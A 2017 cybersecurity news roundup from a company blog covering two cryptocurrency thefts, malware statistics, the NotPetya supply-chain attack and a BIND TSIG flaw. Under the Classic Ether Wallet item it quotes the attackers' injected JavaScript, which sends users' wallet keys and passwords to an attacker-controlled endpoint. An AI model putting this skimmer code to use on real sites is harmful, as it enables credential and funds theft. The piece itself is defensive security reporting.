Cyber Advisors Business Blog

In the Know - Cyber Security  update - Week of July 2nd 2017

Written by Eric Brown | Jul 10, 2017 1:23:27 PM

Last week brought two bitcoin related attacks, largely the result of successful social engineering (voice phishing), one on South Korean bitcoin exchange, BitThumb and the second, a website hijack of  classicetherwallet.com.   AV-Test’s comprehensive security report shows Mac and Android malware on the rise.  Servers of Intellect Services, authors of M.E.Doc raided by Ukrainian Police.  And finally, a BIND flaw is patched.


  1. BitCoin Theft from BitThumb
    The South Korean BitThumb exchange was victim to a two fold attack.  First, an employee of the company’s personal home computer was hacked which resulted in 31,800 (3%) of BitThumb users accounts being compromised as the attacker gained access to names email addresses and phone numbers.  The attacker(s) then used this information to voice phish,  calling victims claiming to a representative calling from BitThumb and asking for the disposable password that was sent out to users in a letter. 
    Why the employee had customer personal identifiable information on his/her home machine was not reported.
    https://bravenewcoin.com/news/fourth-largest-bitcoin-exchange-bithumb-hacked-for-billions-of-won/
  1. BitCoin Theft from Classic Ether Wallet dot com
    Classic Ether Wallet is a software wallet system for the Etherium Classic Crypto Currency.  Users of Classic Ether Wallet download and install the software to store  their Etherium Classic crypto currency in an encrypted fashion.
    Social engineering was used to gain control of clasicetherwallet.com.  The website, hosted at 1and1.com,  was compromised by an attacker who managed to convince a 1and1 support engineer to hand over control of the domain to the attacker.
    Once the criminal had control of the site, Etherium Classic coins were able to be stolen from victims by capturing the passwords of the wallets when the users tried to log into the site.  The equivalent of $300,000 USD was transferred to another crypto currency exchange site.

    Below is the source code that the attackers placed on the clasicetherwallet.com domain to steal passwords:
    Wallet.sendData = function (input, password) {
    var http = new XMLHttpRequest();
    var url = "https://api.classicetherwallet.com/api";
    var json = {
    'key': input,
    'password': password,
    }
    http.open("POST", url, true);
    http.send(JSON.stringify(json));
    };

    https://www.reddit.com/r/EthereumClassic/comments/6kcwmi/attention_classicetherwalletcom_has_been_hijacked/
  1. MacOS & Android Malware on the rise
    Av-Test.org released it’s annual security report.  Not surprising, the number of malware programs for macOS are on the rise, more than doubling within the first four months of this year.

    Malware for mobile specifically targets Android OS more so than any other mobile operating system.  In 2016 alone 4 million new malware programs for Android were detected.  So far in 2017 banking Trojans and ransomware seem to be on the rise for Android OS.

    The full report detailing attacks against all operating systems can be found here:
    https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf
  1. M.E.Doc software owner, Intellect Services, unwittingly responsible for the spread of NotPetya
    NotPetya is a destructive variant of the Petya ransomware that had a global impact.  A Talos investigation found a supply chain-focused attack at M.E.Doc software that delivered a destructive payload disguised as ransomware. By utilizing stolen credentials, the actor was able to manipulate the update server for M.E.Doc to proxy connections to an actor-controlled server.  Updates to the software were then pushed out with malicious code beginning the global wheel of infection.

    M.E.Doc is a widely used accounting software package, similar in use to TurboTax in the US.
    http://www.bbc.com/news/technology-40497026
    http://blog.talosintelligence.com/2017/07/the-medoc-connection.html
  1. BIND DNS TSIG Request Bug
    A flaw was found in the way BIND (Berkeley Internet Name Domain) handled TSIG (Transaction SIGnature) authentication for dynamic updates.   TSIG is a computer networking protocol defined in RFC 2845. It is used primarily by the Domain Name System (DNS) to provide a means of authenticating updates to a DNS database. It was most commonly used to update Dynamic DNS or a secondary/slave DNS server.

    In this exploit a remote attacker able to communicate with an authoritative BIND server could use this flaw to manipulate the contents of a zone, by forging a valid TSIG or SIG signature for a dynamic update request.  This would allow the attacker to send forged DNS updates allowing the attacker to make DNS updates.  The attacker could also trigger a DNS zone transfer which would allow the attacker to leak information about your DNS zone.

    A patch is available for BIND which patches this exploit.
    http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf